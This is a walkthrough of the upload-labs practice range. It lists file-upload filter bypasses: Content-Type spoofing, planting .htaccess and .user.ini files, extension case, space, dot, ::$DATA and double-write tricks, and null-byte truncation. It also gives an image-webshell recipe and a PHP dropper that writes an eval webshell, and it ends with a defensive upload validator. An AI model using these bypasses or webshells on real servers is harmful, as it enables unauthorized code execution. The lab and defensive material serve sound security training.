upload target range (upload-labs)

Disable front-end JS

Change the Content-Type

($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png')

Upload a .php file, intercept the request and change the Content-Type to image/jpeg, image/png or image/gif.

Upload a type that is not denied

$deny_ext = array('.asp','.aspx','.php','.jsp');
jsp jspx jspf asp asa cer aspx php php3 php4 php5 phtml

.htaccess file bypass

Upload a file named .htaccess whose content is

SetHandler application/x-httpd-php

Then upload a jpg file.

.user.ini

First upload a .user.ini file whose content is

auto_prepend_file=5.jpg

Then upload 5.jpg, copy the image address and change the filename to readme.php.

Case bypass

$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");

Upload a .PHP file and access it.

Trailing-space bypass

$file_ext = trim($file_ext); // strip leading and trailing whitespace

Upload a .php file, intercept the request and append a space to the extension.

Trailing-dot bypass

$file_name = deldot($file_name); // remove trailing dots from the filename

Upload a .php file, intercept the request and append a . to the extension.

Special-character ::$DATA bypass

$file_ext = str_ireplace('::$DATA', '', $file_ext); // strip the string ::$DATA

Upload a .php file, intercept the request and change the extension so it ends in ::$DATA; when accessing the file, leave the ::$DATA off.

Name-concatenation bypass

$file_name = deldot($file_name); // remove trailing dots from the filename
!in_array($file_ext, $deny_ext)
$img_path = UPLOAD_PATH.'/'.$file_name;

Upload a .php file and change the extension to .php. . (dot, space, dot).

Double-write bypass

$file_name = str_ireplace($deny_ext,"", $file_name);

The filter is applied only once, so double-write the extension as .pphphp.

%00 truncation

$img_path = $_GET['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;

Requires a PHP version below 5.3.4 with magic_quotes_gpc off; upload a file with a .jpg extension.

POST /uploadlabs/Pass-12/index.php?save_path=../upload/ HTTP/1.1

and change it to

POST /uploadlabs/Pass-12/index.php?save_path=../upload/1.php%00 HTTP/1.1

0x00 truncation

$img_path = $_POST['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;

A POST body is not URL-decoded automatically, so edit it in the Hex view: find the byte after the p and change it to 00, then forward the request to upload.

Image webshell

Making the image webshell

copy zf.jpeg/b + zf.txt/a zf.jpg

Upload zf.jpg directly and reach it through the file inclusion vulnerability. Note that sometimes it cannot be reached by passing a parameter; in that case, have it write a one-line webshell by uploading the following as 14.php and accessing it.

<?php
// Writes zf.php containing the one-line webshell (quotes escaped so the string parses).
$file = fopen('zf.php', 'w');
fputs($file, '<?php @eval($_POST[\'zf\']);?>');
fclose($file);
?>

Modify Content-Type: multipart/form-data and change the file extension to an allowed one

First upload a jpg file and change Content-Type: multipart/form-data so that one letter is uppercase, e.g. Content-Type: Multipart/form-data, to bypass the check.

if (strpos($type, "multipart/form-data") !== false)

Because strpos() is case-sensitive, this method bypasses the check.

$allowexts = array('jpg', 'gif', 'jpeg', 'bmp', 'php4');

Because this is a whitelist, only files with the php4 extension can be uploaded.
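As an added example (not code from upload-labs or from this write-up), one PHP validator that closes every gap the sections above rely on: it rejects null bytes (the %00 / 0x00 truncations), ::$DATA, trailing dots and spaces, dot-files such as .htaccess and .user.ini, checks a lowercase whitelist on the last extension only, requires the client Content-Type to agree without trusting it, and never reuses the client filename. The function and constant names are my own.

```php
<?php
// Allowed extensions; anything else is rejected (no deny list to dodge).
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

// Returns a server-generated storage name, or null when the upload must be rejected.
function safe_upload_name(string $client_name, string $client_mime): ?string
{
    // Null bytes and other control characters: reject outright (%00 / 0x00 truncation).
    if (preg_match('/[\x00-\x1f\x7f]/', $client_name)) {
        return null;
    }
    // NTFS stream suffix (::$DATA) or any other colon: reject, do not strip.
    if (strpos($client_name, ':') !== false) {
        return null;
    }
    // Drop directory parts, then the trailing dots/spaces the filesystem would discard
    // ("shell.php.", "shell.php ", "shell.php. .").
    $base = rtrim(basename($client_name), ". ");
    // Dot-files (.htaccess, .user.ini) have no real extension and configure the server.
    if ($base === '' || $base[0] === '.') {
        return null;
    }
    // Case-insensitive whitelist on the LAST extension only (defeats .PHP, .pphphp, .php5).
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Content-Type is client-controlled: require agreement, never rely on it alone
    // (a finfo check on the temp file's bytes belongs here in a real handler).
    if (!in_array(strtolower($client_mime), ALLOWED_MIME, true)) {
        return null;
    }
    // The stored name is generated by the server, so the client name never reaches disk.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed sample names taken from the bypasses listed above.
$samples = ['ok.jpg', 'shell.PHP', 'shell.php ', 'shell.php. .', 'shell.pphphp',
            '.htaccess', '.user.ini', "1.php\0.jpg", 'shell.php::$DATA', 'a.php.jpg'];
foreach ($samples as $name) {
    $verdict = safe_upload_name($name, 'image/jpeg') === null ? 'rejected' : 'accepted';
    printf("%-20s %s\n", addcslashes($name, "\0"), $verdict);
}
```

Only ok.jpg and a.php.jpg are accepted, and a.php.jpg is stored under a random name ending in .jpg, so the multi-extension name never exists on the server.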